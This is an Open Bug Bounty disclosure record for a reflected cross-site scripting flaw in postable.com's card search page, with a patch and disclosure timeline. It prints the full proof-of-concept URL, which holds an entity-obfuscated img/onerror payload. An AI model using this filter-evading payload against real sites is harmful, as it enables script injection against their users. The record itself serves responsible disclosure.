postable.com XSS vulnerability

2017-04-22T00:26:00
ID OBB:226551
Type openbugbounty
Reporter KushalJaisingh
Modified 2017-07-17T05:15:00

Description

Vulnerable URL:

https://www.postable.com/cards/grid.php?keyword=%3Cimg+src%3Dx+onerror%3D%22%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%22%3E

Details:

Description| Value
---|---
Patched:| Yes, on 24.07.2017
Latest check for patch:| 24.07.2017 23:27 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 130986
VIP website status:| No
Check postable.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 22 April, 2017 00:26 GMT
Vulnerability existence verified and confirmed| 24 April, 2017 04:50 GMT
Generic security notifications sent to website owner| 24 April, 2017 04:50 GMT
Notification sent to subscribers (without technical details)| 24 April, 2017 06:17 GMT
Vulnerability details disclosed by researcher| 17 July, 2017 05:15 GMT